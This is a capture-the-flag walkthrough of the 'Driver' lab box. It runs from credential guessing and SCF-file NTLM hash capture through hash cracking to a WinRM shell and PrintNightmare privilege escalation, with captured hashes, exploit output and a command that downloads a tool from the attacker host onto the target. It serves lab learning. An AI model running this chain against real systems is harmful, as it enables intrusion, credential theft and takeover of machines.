Overview
To cut a long story short, this is a Windows machine that has an opening web page with guessable credentials, gave us a file upload portal through which can be used to trigger SCF file upload vulnerability, subsequently granted us a shell via WinRM, which showed us a vulnerable printing service that we can take advantage of to get Administrator shell.
I. Scanning
So basically, it’s a Windows box with Samba shares and HTTP port opening.
# Nmap 7.92 scan initiated Thu Feb 3 21:46:00 2022 as: nmap -sC -sV -p- -oN nmap-fullports.txt driver.htb
Nmap scan report for driver.htb
Host is up (0.039s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-04T09:47:57
|_ start_date: 2022-02-03T15:59:59
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 7 21:48:32 2022 -- 1 IP address (1 host up) scanned in 151.91 seconds
Just don’t forget to scan all ports (with -p- switch) in order not to miss that port 5985.
Upon opening the web page, the site asked for HTTP Basic Authentication.
II. Failed enumeration attempts
At first glance, I didn’t bother with the login form and looked for other endpoints instead. However, looking at Gobuster scan result:
# Port 80 scan result
/images (Status: 403) [Size: 1233]
/%c3%90%c2%a0%c3%91%c2%83%c3%91%c2%81%c3%91%c2%81%c3%90%c2%ba%c3%90%c2%b8%c3%90%c2%b9%c3%90%c2%9f%c3%90%c2%b8%c3%91%c2%82%c3%90%c2%be%c3%90%c2%bd (Status: 400) [Size: 324]
/%20%09adobe%20photoshop%20elements%205 (Status: 400) [Size: 324]
/%09tuneup (Status: 400) [Size: 324]
/alcohol120%1952722c (Status: 400) [Size: 324]
And dirbuster result:
… eventually, I gave up on this attack vector. Then I went to SMB and tried my luck on it.
┌──(kali㉿kali)-[~/ctf/htb/Driver]
└─$ smbclient --no-pass -L //10.10.11.106
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/ctf/htb/Driver]
└─$ smbclient -U guest -L //10.10.11.106/
Enter WORKGROUP\guest password:
session setup failed: NT_STATUS_ACCOUNT_DISABLED
To my surprise, guest account was disabled and anonymous access was denied while this’s supposed to be an easy box. Placing a bet on outdated software + public exploits combo also turned out to be a mistake shortly after:
msf6 exploit(windows/smb/cve_2020_0796_smbghost) > exploit
[*] Started reverse TCP handler on 10.10.14.8:9999
[*] 10.10.11.106:445 - Running automatic check ("set AutoCheck false" to disable)
[-] 10.10.11.106:445 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
# From https://github.com/ZecOps/CVE-2020-0796-RCE-POC
$ python3 SMBleedingGhost.py 10.10.11.106 10.10.14.8 8080
CVE-2020-0796 Remote Code Execution POC
(c) 2020 ZecOps, Inc.
Target is not vulnerable
Some other enumeration attepmts I learnt from HackTricks also felt short as they returned no novel information.
III. Successful enumeration attempts
Afterwards, somehow I followed my nose and randomly typed admin - password into the HTTP simple login form, as well as admin - pass. In the third attempt with admin - admin, it happily got me through:
Next, I maniacally clicked on whatever seems clickable. In spite of that, there was nothing but this firmware update page:
Through Burp Suite, the page appeared to be a fundamental file uploading page, directly via HTTP POST request, with no validation whatsoever. Wappalyzer suggested a PHP backend, therefore, I tried a PHP reverse shell along with some other web payloads and Windows payloads. Nonetheless, nothing worked, which compelled us to seek out for a better attack vector.
But hold on, files, with SMB… At that moment, my mind finally pieced the clues together and the answer suddenly dawned on me: How about a SCF file attack?
This straght-to-the-point guide from Pentestlab covered all knowledge needed to start diving into exploiting the vulnerability. Thus, just strictly follow the guide and we got some sweet hashes like this:
msf6 auxiliary(server/capture/smb) > exploit
[*] Auxiliary module running as background job 1.
[*] Server is running. Listening on 10.10.14.21:445
msf6 auxiliary(server/capture/smb) >
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:7dddc33ef0e24ca4:0365b04698b0c7b26f59c27bd7ceae61:0101000000000000007e17dbda1bd801835bdaa9e8a14d09000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800007e17dbda1bd8010600040002000000080030003000000000000000000000000020000060482ada3a682ca5c10eedb3a409d998e199cf3efff574506cf644e8c94799160a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0032003100000000000000000000000000
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:e6fbeb49363872ac:cc3944c26e2cb37a604ed94691a61e3a:01010000000000008014b0dbda1bd80185625afe652e0d74000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f0075007300070008008014b0dbda1bd8010600040002000000080030003000000000000000000000000020000060482ada3a682ca5c10eedb3a409d998e199cf3efff574506cf644e8c94799160a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0032003100000000000000000000000000
# and several more that looks pretty much alike
Because I didn’t know which one was the “legitimate” hash, using some small scripting tricks I dumped them all into separate files, so as to check them using hashid.
┌──(kali㉿kali)-[~/ctf/htb/Driver]
└─$ hashid userhash
--File 'userhash'--
Analyzing 'tony::DRIVER:7dddc33ef0e24ca4:0365b04698b0c7b26f59c27bd7ceae61:0101000000000000007e17dbda1bd801835bdaa9e8a14d09000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000'
[+] NetNTLMv2
Analyzing '400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800007e17dbda1bd8010600040002000000080030003000000000000000000000000020000060482ada3a682ca5c10eedb3a409d998e199cf3efff574506cf644e8c94799160a00100'
[+] Unknown hash
Analyzing '0000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0032003100000000000000000000000000'
[+] Unknown hash
--End of file 'userhash'--
┌──(kali㉿kali)-[~/ctf/htb/Driver]
└─$ hashid userhash2
--File 'userhash2'--
Analyzing <REDACTED>
[+] NetNTLMv2
--End of file 'userhash2'--
IV. Foothold
You will miss all the fun if I let on all the real credentials. For that reason, critical credentials will be redacted from this point onwards.
A question is, where to use all these hashes? An obvious answer is via the WinRM 5985 port.
Next question would be, “how”? Well, let’s go for a must-have tool - evil-winrm. Installing instructions are all clearly put accross in its README file, so I’ll not go into details here.
Checking for options evil-winrm provides, there’s a -H switch to log in with NTML hash. However…
$ evil-winrm -i driver.htb -u tony -H "<REDACTED_LEGITIMATE_HASH>"
Evil-WinRM shell v3.3
Error: Invalid hash format
It didn’t work, and god knows why. Consequently, it was unavoidable to face the hassle of cracking this hash on my potato machine. Thankfully the hash didn’t take donkey’s years to crack.
$ john userhash2
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
<REDACTED_TONY_PASSWORD> (tony)
1g 0:00:02:44 DONE 3/3 (2022-02-07 01:43) 0.006064g/s 957216p/s 957216c/s 957216C/s labzter..lilton3
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
With the password now in own hand, it’s a piece of cake getting a shell callback.
$ evil-winrm -i driver.htb -u tony -p <REDACTED_TONY_PASSWORD>
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
And the rock stable shell of evil-winrm easily led me to the user flag:
*Evil-WinRM* PS C:\Users\tony\Desktop> Get-ChildItem
Directory: C:\Users\tony\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/7/2022 5:21 AM 34 user.txt
V. Privilege Escalation
First and foremost, WinPEAS all the way through.
On our attacker machine:
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220206/winPEASany.exe -O finding.exe
On the remote shell:
Invoke-WebRequest -URI http://10.10.14.21/finding.exe -UseBasicParsing -OutFile finding.exe
Carefully examining WinPEAS result, we cannot see many exeptional things showed up, but the most notable one is probably a runing service named spoolsv.exe.
In short, spoolsv signifies the existence of a printer and printing drivers, which reminds us about the unforgettable PrintNightmare - a vulnerability chain comprises of CVE-2021-34527, CVE-2021-34481 (for RCE) and CVE-2021-1675 (for local privilege escalation). Unquestionably, we will use the last one.
A quick Github search led me to a C# POC that seems to work.
However, its setup called for an abundance of time, so I gave it a miss and tried out this simple script instead.
Without further ado, I straghtforwardly followed the README and it smoothly did the trick.
*Evil-WinRM* PS C:\Users\tony\Downloads> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
At that point, what’s left was to log in using adm1n account (which has Administrator privilege) and snatch the flag.
evil-winrm -i driver.htb -u adm1n -p P@ssw0rd
Root flag can be found effortlessly at Administrator’s Desktop folder.
*Evil-WinRM* PS C:\Users\Administrator> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/8/2022 5:04 AM 34 root.txt
And that’s all. Hope you’ve enjoyed this vastly informative box.